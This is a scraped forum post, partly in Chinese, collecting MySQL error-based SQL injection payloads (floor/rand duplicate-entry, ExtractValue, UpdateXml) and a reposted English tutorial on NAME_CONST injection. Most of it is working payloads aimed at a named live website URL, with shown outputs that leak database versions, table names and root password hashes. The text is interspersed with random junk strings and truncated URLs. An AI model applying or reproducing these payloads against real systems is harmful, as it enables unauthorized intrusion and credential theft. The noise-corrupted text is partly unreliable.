|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
, j* q x' T* v9 }, ~首先进行正常查询: mysql> select * from article where id = 1;
/ H0 H% c: o9 y& _$ E$ z+—-+——-+———+
$ K! t3 T. J: M: p| id | title | content |3 Q3 d7 I; I& Y& A
+—-+——-+———+" u2 L8 g( Y- @ y% ]2 M
| 1 | test | do it |# d$ ~5 m1 R0 r$ N" }
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);+ o/ N: ^% ?9 R) `* Z& v$ ~1 ^& Y
ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。& R7 E7 D. g' r! Y1 q: \
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);! f1 k' J# y }1 F8 A5 c7 v
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));, J7 ~+ p1 e \5 a
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue, I H1 X: z6 C" l% V( P z1 F
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–. T* r$ {' o" L2 L( d/ d
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
2 D9 v' q' E0 E5 V: ^8 X7 f1 r* H* Q! J
再收集: Z) S; p3 D' W. h
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
+ ^. M7 H1 v6 T# P1 m, f9 v( N. X
Error uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’
, e& j8 A+ h( s4 }4 j$ E' n- Z' A5 @' b5 U0 w3 Q8 H
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c); C L; x R' ]1 M, X& p7 Q
$ D" n* }$ E8 ]; ]
Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
/ U3 S9 b4 K, w" t; D H. d" w: f' f5 l: M/ f3 K9 {% J0 h
MYSQL高版本报错注入技巧-利用NAME_CONST注入
0 u0 M8 p* }3 z7 m% |5 b7 A& EIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
. p! D( u6 y* W8 [$ D" R i" N4 A" w% t) c3 Y; n
' U9 h& j/ X2 T5 U4 `% ]& d" c
相关信息
* P% P) {7 M& C: ?. W; d; Z+ V
. Q+ K! C2 Y# h' @NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.; }, M$ y1 ~# n- j. g
% l3 k& s% h0 H4 h v( ?: P" [
Code:
: f. F$ N% q# b: M$ SNAME_CONST(DATA, VALUE)
- ^$ l2 c2 z! [- M: {9 O7 T' y0 ?7 e
' q8 ?" I E6 ~- ^& [: lReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
j. J5 Y1 M# K8 i
; n4 i0 ]6 w# H6 ~8 mSELECT NAME_CONST('TEST', 1)+ B! i( F" g1 D5 B2 L
; A! c. z- Z. R
g6 n2 \1 |0 E8 y: d7 F) B3 X m8 |( O
|---------------|
$ m8 I- O" r8 i1 x$ X- Y| TEST |
( a3 x) x$ m# w. q6 _1 V| |8 C5 a4 `0 ?4 a" S6 T @+ }7 o
|---------------|% s/ x0 Q, |" Z# N- D% r: f
| 1 |) J# d8 ^9 H3 c
| |" i ~ X& a- B
|---------------|4 k9 m& c% ^2 |
1 U- Q: Z, g: i% J( x8 |) [
& \5 J, ^/ R& @) `
) f- ?0 n/ T9 C; K" I( L% `) U9 T( J& ~# N
http://dev.mysql.com/doc/refman/5.0/en/m...name-const. D5 m- g- W0 X
Intro to MySQL Variables
& T6 h) Y0 ^* ]# f+ u
" b9 m* a9 x* }/ Q7 j. JOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST. ]& |- M4 R; G' \# _0 x$ Q
7 ]: y" e* n3 o9 |1 D) ECode:9 w# x- ~# g0 |+ w
http://www.baido.hk/qcwh/content ... ;sid=19&cid=2616 i B0 W; ]0 \, p, z- X
: R- a8 h. o7 d7 k Q4 n
4 b" Z: j/ B# A& e; b/ U* _
. c `" U2 d2 s, b! \# x# O d+ [
; }1 V& y5 Q# j6 T1 f; R o2 B0 T, b. h/ J6 a @/ _ c; P
Code:
9 r+ {% G; s; O. o- }2 Fand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--2 p$ p" O9 r4 R6 {4 y( C! t
, ~) G7 \1 d. x5 j
) D* J% y$ M# o0 d& ]VAR = Your MySQL variable.
( v: G8 v4 Y. c) z
6 ^8 v& v. r4 jMySQL 5.1.3 Server System Variables- c! H3 I% z3 \% p' `( \
3 b% Y; t' M& o, cLet's try it out on my site..$ j* C0 K. D0 o6 w; l _ r5 E
: \5 C& C) K. I, U. a8 m
Code:/ a6 L' c9 c) ]
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
# f: m2 Q! F7 U& U/ e
9 o4 Q; A2 A) J3 U- UError uplicate column name '5.0.27-community-nt'$ R; q8 x& `6 k- Q; H
3 ^5 y" _) k) u0 g% x
; @; Z0 v5 n0 [, d( {4 U. z
& }3 U7 }0 ~: x# @6 }0 h
3 `- e H( @' V( q
' x! A. w6 i# g b, Y5 `Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
, u: i1 ^# m$ \. k
2 [* c4 m, b1 aData Extraction9 N+ A* J3 t6 l1 Z( x% v4 ]
( g9 ]0 T7 G+ q' F
Code:6 U! u1 y, r6 I9 D1 x* j
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--1 N$ i/ E, a8 Z y& F4 z* B( t( H
9 ^$ O6 n& N4 V5 [0 K3 m6 A
+ {5 E& e- E% IWe should get a duplicate column 1 error...
+ X0 `% n1 ^, J% f4 S' f
* r2 |& [9 b! s: JCode:
1 d; _9 d" ^$ h1 R ]http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--1 e' P' Y; t* G4 ?6 t1 P
, @" f3 |4 T7 p5 Y8 @4 L0 i
Error uplicate column name '1# }5 [, Q( @. j! J. M% Q' K4 J
; S8 J H0 m, h) B2 I
0 Q1 C- x X. @6 e+ Q- j
" m" }- `( j9 B3 k( v3 @& C% _# I; B& W7 B" T! ^4 L
0 W0 Q3 y X3 U- {: l" L* J
x! N8 ^! C! D
Now let's get the tables out this bitch... [1 X V" t% Z- X) f/ y
& w) o( ]; I- XCode:3 @) m5 B) h- Q& q9 l) q7 [4 s! I
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--: M( o, u# t5 _% W
0 A |0 Q; C4 W% p% H# p: U; \
) U5 L+ e! f9 m9 g+ L9 z: m. `Let's see if it works here, if it does, we can go on and finish the job.
4 ~8 x) ^& N' L, [: E! ^' I
8 b0 s2 v! {/ l" c" S* X' J) f- dCode:
) K. Y) i6 j1 f) Nhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--, K- n* J8 v1 |, d0 g7 V4 ]
3 I) A; @& v4 l
+ n+ r: S& j/ e6 g0 BError uplicate column name 'com_admanage
7 _. ~3 D" y4 U' [0 ]3 J$ D- Z: @: U7 t+ ?; B( @
4 u& s+ }- T7 W" N: `& R( J" L4 N
) f. b% E/ Z2 I9 j/ o. H( B8 m& U
" X6 ?* w2 W% ]6 D! I2 D
t; _8 @' [% s+ {
. ^9 o) T. } E/ J' l2 `2 ]Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.. v& t" w' y* S9 A$ N1 N
. Y( c/ h/ d0 s* f: g4 P$ {
Let's get the columns out of the user table..8 P: l9 ~7 @( O; o% x* }
x* ]6 [& n" B7 FCode:: T1 n& e7 @ h$ |" ^: o, x- i
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--8 ?+ o9 z% A, C* ^% g+ x
1 E9 {' d5 w! {: E7 |: U ~7 G5 h, f. O
So mine looks like this, and I get the duplicate column name 'Host'., a# J5 H8 i, O, t4 a
( h3 J4 x6 B8 k5 o) P, ~$ r6 T U
Code:
% [# X1 d1 J7 dhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
2 V; M( @8 A5 x% e L* h% Y
7 q) f8 {$ X a, o4 B$ RError uplicate column name 'Host'
/ ` c. S, k" U
6 j N4 B: z, R1 N
& J) o1 @' y9 }) e$ m: C9 m; t, I t) b1 C
$ ? r% x! c! q- u, N8 g- s2 B
" @! ?3 G; X% y- O
3 ]1 Y" J. Y3 H' {
Woot, time to finish this bitch off.
; @$ t$ }) R: A( h5 x4 O9 g# R
z' ]) C( r: ]8 r& R# ]Code:
! w3 T5 N0 w3 q6 F+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--. R" U# x; _' V; m
( A% ~6 D" P+ i: Y7 L* a, F2 B+ L( E! i' h8 I5 T6 H
So mine looks like this...: @, P. Z* |: {+ H
2 G2 S3 Z- ^! Y# ^Code:
C" k# X4 s+ Xhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
+ A+ |$ J& w2 H$ {9 _* m. F$ d" O- T
I+ `, P+ F. ZError uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
% |( E5 c6 D2 [- K
2 D+ E+ y6 l! b6 z* s) {) Z( f! i$ R5 F. E3 n
% R# H6 |6 C0 f% k
% r) R- _1 I! v) k: v/ x! V8 M& G
' \$ Z: z! {6 o t# w- N `$ X( H, L$ P; k5 E7 i H, i; m
And there we have it, thanks for reading.
$ {4 U5 p* `1 e. C0 K- {' i7 x( e6 ^( V! w u, h7 B1 I4 ]
|